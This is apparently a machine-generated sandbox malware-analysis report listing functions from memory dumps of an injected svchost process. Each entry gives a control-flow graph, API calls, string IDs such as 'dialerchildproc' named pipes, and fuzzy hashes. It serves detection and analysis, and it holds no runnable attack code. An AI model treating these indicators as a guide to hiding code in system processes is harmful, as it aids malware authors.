                                                                                                                                                                                            control_flow_graph 205 142db406910-142db406916 206 142db406918-142db40691b 205->206 207 142db406951-142db40695b 205->207 209 142db406945-142db406984 call 142db406fc0 206->209 210 142db40691d-142db406920 206->210 208 142db406a78-142db406a8d 207->208 211 142db406a9c-142db406ab6 call 142db406e54 208->211 212 142db406a8f 208->212 228 142db406a52 209->228 229 142db40698a-142db40699f call 142db406e54 209->229 214 142db406922-142db406925 210->214 215 142db406938 __scrt_dllmain_crt_thread_attach 210->215 226 142db406ab8-142db406aed call 142db406f7c call 142db406e1c call 142db407318 call 142db407130 call 142db407154 call 142db406fac 211->226 227 142db406aef-142db406b20 call 142db407190 211->227 218 142db406a91-142db406a9b 212->218 216 142db406927-142db406930 214->216 217 142db406931-142db406936 call 142db406f04 214->217 220 142db40693d-142db406944 215->220 217->220 226->218 237 142db406b22-142db406b28 227->237 238 142db406b31-142db406b37 227->238 232 142db406a54-142db406a69 228->232 240 142db4069a5-142db4069b6 call 142db406ec4 229->240 241 142db406a6a-142db406a77 call 142db407190 229->241 237->238 242 142db406b2a-142db406b2c 237->242 243 142db406b39-142db406b43 238->243 244 142db406b7e-142db406b94 call 142db40268c 238->244 255 142db406a07-142db406a11 call 142db407130 240->255 256 142db4069b8-142db4069dc call 142db4072dc call 142db406e0c call 142db406e38 call 142db40ac0c 240->256 241->208 250 142db406c1f-142db406c2c 242->250 251 142db406b45-142db406b4d 243->251 252 142db406b4f-142db406b5d call 142db415780 243->252 262 142db406b96-142db406b98 244->262 263 142db406bcc-142db406bce 244->263 258 142db406b63-142db406b78 call 142db406910 251->258 252->258 273 142db406c15-142db406c1d 252->273 255->228 276 142db406a13-142db406a1f call 142db407180 255->276 256->255 308 142db4069de-142db4069e5 __scrt_dllmain_after_initialize_c 256->308 258->244 258->273 262->263 270 142db406b9a-142db406bbc call 142db40268c call 142db406a78 262->270 271 142db406bd5-142db406bea call 142db406910 263->271 272 142db406bd0-142db406bd3 263->272 270->263 302 142db406bbe-142db406bc6 call 142db415780 270->302 271->273 287 142db406bec-142db406bf6 271->287 272->271 272->273 273->250 295 142db406a45-142db406a50 276->295 296 142db406a21-142db406a2b call 142db407098 276->296 292 142db406bf8-142db406bff 287->292 293 142db406c01-142db406c11 call 142db415780 287->293 292->273 293->273 295->232 296->295 307 142db406a2d-142db406a3b 296->307 302->263 307->295 308->255 309 142db4069e7-142db406a04 call 142db40abc8 308->309 309->255
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2466799822.00000142DB400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000142DB400000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db400000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                            • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                                                                                                                            • API String ID: 190073905-1786718095
                                                                                                                                                                                            • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                                                            • Instruction ID: ecdb0c3f156dfe6b4b40604db64620ada7bff06d686fe58901025faafbd66c12
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                                                            • Instruction Fuzzy Hash: D081B171E1424186FA50EBE594723DD6EE1EB867A0FF48025FB4A477B6DB38C8C59B00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB14CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00000142DB14CE37
                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00000142DB150A6B,?,?,?,00000142DB15045C,?,?,?,00000142DB14C84F), ref: 00000142DB14CE4C
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000142DB150A6B,?,?,?,00000142DB15045C,?,?,?,00000142DB14C84F), ref: 00000142DB14CE6D
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000142DB150A6B,?,?,?,00000142DB15045C,?,?,?,00000142DB14C84F), ref: 00000142DB14CE9A
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000142DB150A6B,?,?,?,00000142DB15045C,?,?,?,00000142DB14C84F), ref: 00000142DB14CEAB
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000142DB150A6B,?,?,?,00000142DB15045C,?,?,?,00000142DB14C84F), ref: 00000142DB14CEBC
                                                                                                                                                                                            • SetLastError.KERNEL32 ref: 00000142DB14CED7
                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000142DB150A6B,?,?,?,00000142DB15045C,?,?,?,00000142DB14C84F), ref: 00000142DB14CF0D
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,00000001,00000142DB14ECCC,?,?,?,?,00000142DB14BF9F,?,?,?,?,?,00000142DB147AB0), ref: 00000142DB14CF2C
                                                                                                                                                                                              • Part of subcall function 00000142DB14D6CC: HeapAlloc.KERNEL32 ref: 00000142DB14D721
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000142DB150A6B,?,?,?,00000142DB15045C,?,?,?,00000142DB14C84F), ref: 00000142DB14CF54
                                                                                                                                                                                              • Part of subcall function 00000142DB14D744: HeapFree.KERNEL32 ref: 00000142DB14D75A
                                                                                                                                                                                              • Part of subcall function 00000142DB14D744: GetLastError.KERNEL32 ref: 00000142DB14D764
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000142DB150A6B,?,?,?,00000142DB15045C,?,?,?,00000142DB14C84F), ref: 00000142DB14CF65
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000142DB150A6B,?,?,?,00000142DB15045C,?,?,?,00000142DB14C84F), ref: 00000142DB14CF76
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 570795689-0
                                                                                                                                                                                            • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                                                                                            • Instruction ID: a8e449600d41014678fb659f695021104937e61fdd3f2c4ea5910744104af501
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                                                                                            • Instruction Fuzzy Hash: 42413C70E0124446FE68A7F555763EA2A925B8C7B4FE40B24F93A477FEDE38C4D18600
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB142244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                                                                                                            • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                                                                                                                            • API String ID: 2171963597-1373409510
                                                                                                                                                                                            • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                                                                                            • Instruction ID: abf6e07a81c308cf3c82ce5fb692e052069be19637cf244d2deb0e1402958285
                                                                                                                                                                                            • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                                                                                            • Instruction Fuzzy Hash: E6211D36A1464082EB10CBA5E4647AA7BB1F78DBA5F904215EA5903ABCDF7CC589CB40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB409944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 584 142db409944-142db4099ac call 142db40a814 587 142db4099b2-142db4099b5 584->587 588 142db409e13-142db409e1b call 142db40bb48 584->588 587->588 589 142db4099bb-142db4099c1 587->589 591 142db4099c7-142db4099cb 589->591 592 142db409a90-142db409aa2 589->592 591->592 596 142db4099d1-142db4099dc 591->596 594 142db409d63-142db409d67 592->594 595 142db409aa8-142db409aac 592->595 599 142db409d69-142db409d70 594->599 600 142db409da0-142db409daa call 142db408a34 594->600 595->594 597 142db409ab2-142db409abd 595->597 596->592 598 142db4099e2-142db4099e7 596->598 597->594 601 142db409ac3-142db409aca 597->601 598->592 602 142db4099ed-142db4099f7 call 142db408a34 598->602 599->588 603 142db409d76-142db409d9b call 142db409e1c 599->603 600->588 613 142db409dac-142db409dcb call 142db406d40 600->613 605 142db409c94-142db409ca0 601->605 606 142db409ad0-142db409b07 call 142db408e10 601->606 602->613 617 142db4099fd-142db409a28 call 142db408a34 * 2 call 142db409124 602->617 603->600 605->600 610 142db409ca6-142db409caa 605->610 606->605 622 142db409b0d-142db409b15 606->622 614 142db409cba-142db409cc2 610->614 615 142db409cac-142db409cb8 call 142db4090e4 610->615 614->600 621 142db409cc8-142db409cd5 call 142db408cb4 614->621 615->614 628 142db409cdb-142db409ce3 615->628 653 142db409a48-142db409a52 call 142db408a34 617->653 654 142db409a2a-142db409a2e 617->654 621->600 621->628 626 142db409b19-142db409b4b 622->626 630 142db409c87-142db409c8e 626->630 631 142db409b51-142db409b5c 626->631 633 142db409df6-142db409e12 call 142db408a34 * 2 call 142db40baa8 628->633 634 142db409ce9-142db409ced 628->634 630->605 630->626 631->630 635 142db409b62-142db409b7b 631->635 633->588 637 142db409cef-142db409cfe call 142db4090e4 634->637 638 142db409d00 634->638 639 142db409c74-142db409c79 635->639 640 142db409b81-142db409bc6 call 142db4090f8 * 2 635->640 648 142db409d03-142db409d0d call 142db40a8ac 637->648 638->648 644 142db409c84 639->644 665 142db409c04-142db409c0a 640->665 666 142db409bc8-142db409bee call 142db4090f8 call 142db40a038 640->666 644->630 648->600 662 142db409d13-142db409d61 call 142db408d44 call 142db408f50 648->662 653->592 669 142db409a54-142db409a74 call 142db408a34 * 2 call 142db40a8ac 653->669 654->653 659 142db409a30-142db409a3b 654->659 659->653 661 142db409a3d-142db409a42 659->661 661->588 661->653 662->600 673 142db409c7b 665->673 674 142db409c0c-142db409c10 665->674 684 142db409c15-142db409c72 call 142db409870 666->684 685 142db409bf0-142db409c02 666->685 690 142db409a76-142db409a80 call 142db40a99c 669->690 691 142db409a8b 669->691 678 142db409c80 673->678 674->640 678->644 684->678 685->665 685->666 694 142db409a86-142db409def call 142db4086ac call 142db40a3f4 call 142db4088a0 690->694 695 142db409df0-142db409df5 call 142db40baa8 690->695 691->592 694->695 695->633
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2466799822.00000142DB400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000142DB400000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db400000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                                                            • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                                                                                                                            • Instruction ID: 3e7a80f63f3a48b25056433b5ce555902fa23a32841bdcc295e1748cae6abe28
                                                                                                                                                                                            • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 73E14D72A04B808AEB60DFA9D4A03DD7BA4F795798FA04115FF8957BA9CB38C5D1C700
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB14A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 463 142db14a544-142db14a5ac call 142db14b414 466 142db14a5b2-142db14a5b5 463->466 467 142db14aa13-142db14aa1b call 142db14c748 463->467 466->467 468 142db14a5bb-142db14a5c1 466->468 470 142db14a5c7-142db14a5cb 468->470 471 142db14a690-142db14a6a2 468->471 470->471 475 142db14a5d1-142db14a5dc 470->475 473 142db14a6a8-142db14a6ac 471->473 474 142db14a963-142db14a967 471->474 473->474 478 142db14a6b2-142db14a6bd 473->478 476 142db14a969-142db14a970 474->476 477 142db14a9a0-142db14a9aa call 142db149634 474->477 475->471 479 142db14a5e2-142db14a5e7 475->479 476->467 480 142db14a976-142db14a99b call 142db14aa1c 476->480 477->467 489 142db14a9ac-142db14a9cb call 142db147940 477->489 478->474 482 142db14a6c3-142db14a6ca 478->482 479->471 483 142db14a5ed-142db14a5f7 call 142db149634 479->483 480->477 486 142db14a894-142db14a8a0 482->486 487 142db14a6d0-142db14a707 call 142db149a10 482->487 483->489 497 142db14a5fd-142db14a628 call 142db149634 * 2 call 142db149d24 483->497 486->477 490 142db14a8a6-142db14a8aa 486->490 487->486 502 142db14a70d-142db14a715 487->502 494 142db14a8ba-142db14a8c2 490->494 495 142db14a8ac-142db14a8b8 call 142db149ce4 490->495 494->477 501 142db14a8c8-142db14a8d5 call 142db1498b4 494->501 495->494 511 142db14a8db-142db14a8e3 495->511 531 142db14a648-142db14a652 call 142db149634 497->531 532 142db14a62a-142db14a62e 497->532 501->477 501->511 503 142db14a719-142db14a74b 502->503 508 142db14a887-142db14a88e 503->508 509 142db14a751-142db14a75c 503->509 508->486 508->503 509->508 512 142db14a762-142db14a77b 509->512 513 142db14a9f6-142db14aa12 call 142db149634 * 2 call 142db14c6a8 511->513 514 142db14a8e9-142db14a8ed 511->514 516 142db14a874-142db14a879 512->516 517 142db14a781-142db14a7c6 call 142db149cf8 * 2 512->517 513->467 518 142db14a8ef-142db14a8fe call 142db149ce4 514->518 519 142db14a900 514->519 522 142db14a884 516->522 544 142db14a7c8-142db14a7ee call 142db149cf8 call 142db14ac38 517->544 545 142db14a804-142db14a80a 517->545 527 142db14a903-142db14a90d call 142db14b4ac 518->527 519->527 522->508 527->477 542 142db14a913-142db14a961 call 142db149944 call 142db149b50 527->542 531->471 548 142db14a654-142db14a674 call 142db149634 * 2 call 142db14b4ac 531->548 532->531 536 142db14a630-142db14a63b 532->536 536->531 541 142db14a63d-142db14a642 536->541 541->467 541->531 542->477 564 142db14a815-142db14a872 call 142db14a470 544->564 565 142db14a7f0-142db14a802 544->565 552 142db14a87b 545->552 553 142db14a80c-142db14a810 545->553 569 142db14a676-142db14a680 call 142db14b59c 548->569 570 142db14a68b 548->570 554 142db14a880 552->554 553->517 554->522 564->554 565->544 565->545 573 142db14a686-142db14a9ef call 142db1492ac call 142db14aff4 call 142db1494a0 569->573 574 142db14a9f0-142db14a9f5 call 142db14c6a8 569->574 570->471 573->574 574->513
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                                                            • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                                                                                            • Instruction ID: b710c18d62406256a6d01fa71f76a1f3423cd14aa9e07b74dc447faa929e683c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9BE19C72A14B808AEB60DFA5D4A03DD7BA4F749B98F910116FE8957BAECB34D0D5C700
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB14F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                                                            • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                                                                                            • Instruction ID: 0969ce06c619d85f1fa6e7e82bb55e918ddfe02fd0fe87e4eff05afcb529d083
                                                                                                                                                                                            • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9841C332F11A0091EA56CBE6A8647D92BD1B74DBE0F894529FD1E877ACEE38C4C58350
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB14104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 735 142db14104c-142db1410b9 RegQueryInfoKeyW 736 142db1411b5-142db1411d0 735->736 737 142db1410bf-142db1410c9 735->737 737->736 738 142db1410cf-142db14111f RegEnumValueW 737->738 739 142db1411a5-142db1411af 738->739 740 142db141125-142db14112a 738->740 739->736 739->738 740->739 741 142db14112c-142db141135 740->741 742 142db141147-142db14114c 741->742 743 142db141137 741->743 745 142db141199-142db1411a3 742->745 746 142db14114e-142db141193 GetProcessHeap call 142db156168 GetProcessHeap HeapFree 742->746 744 142db14113b-142db14113f 743->744 744->739 747 142db141141-142db141145 744->747 745->739 746->745 747->742 747->744
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                                                                            • String ID: d
                                                                                                                                                                                            • API String ID: 3743429067-2564639436
                                                                                                                                                                                            • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                            • Instruction ID: 128bdfcedbf692b54ab2d1e5e7e39657242029bd48fe8fe8933fd312fdaad6e9
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                            • Instruction Fuzzy Hash: A5415E33614B84C6E760CF61E45479E7BB1F389B98F448129EA8A07B6CDF38C599CB40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB14D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00000142DB14C7DE,?,?,?,?,?,?,?,?,00000142DB14CF9D,?,?,00000001), ref: 00000142DB14D087
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000142DB14C7DE,?,?,?,?,?,?,?,?,00000142DB14CF9D,?,?,00000001), ref: 00000142DB14D0A6
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000142DB14C7DE,?,?,?,?,?,?,?,?,00000142DB14CF9D,?,?,00000001), ref: 00000142DB14D0CE
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000142DB14C7DE,?,?,?,?,?,?,?,?,00000142DB14CF9D,?,?,00000001), ref: 00000142DB14D0DF
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000142DB14C7DE,?,?,?,?,?,?,?,?,00000142DB14CF9D,?,?,00000001), ref: 00000142DB14D0F0
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                            • String ID: 1%$Y%
                                                                                                                                                                                            • API String ID: 3702945584-1395475152
                                                                                                                                                                                            • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                                                                                            • Instruction ID: 9b02bf5771c9a76509d06a5c5e829608d442eca32e2d450e265a2929a0341469
                                                                                                                                                                                            • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                                                                                            • Instruction Fuzzy Hash: B0116070F0428441FE68A7B659723EA6A515B4D7F4FA45724F839477FEDE38C8C28200
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB147510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 190073905-0
                                                                                                                                                                                            • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                                                            • Instruction ID: 68df2b65cc5af88c068d796c024e9d6b8c3f2ed4998e7db4bdef3ec0c4d249fa
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                                                            • Instruction Fuzzy Hash: E481D671E1024186FB91ABE9A4713D96EE1EB4D780FD44625F908877BEDB38C9C5C740
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB149DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                                                            • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                                                                                            • Instruction ID: 50986ca00955494349e55048cac6590b6220248f09435d3bd7496c5e441c14af
                                                                                                                                                                                            • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                                                                                            • Instruction Fuzzy Hash: F631A531B12640E5EE51DB82A5607E92AE4B74CBE0F990535FD1D1B7B8DF39C4C58310
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB153DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                                                            • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                                                                                            • Instruction ID: ae0d1fcea9a2a9afa7ce188eafc02b01f031a7d2d5b0520001199734e3c84f0d
                                                                                                                                                                                            • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                                                                                            • Instruction Fuzzy Hash: D8116331B10B8086E7508B92F8647597AF0F78CFE4F844224FA5A877B8DF38C5948740
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB143790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                                                                                            • String ID: wr
                                                                                                                                                                                            • API String ID: 1092925422-2678910430
                                                                                                                                                                                            • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                                                                                            • Instruction ID: 69563142b96651d4f2c669348d08a304097e6eb42b4bc269a64f0cc9bbe7c7d8
                                                                                                                                                                                            • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
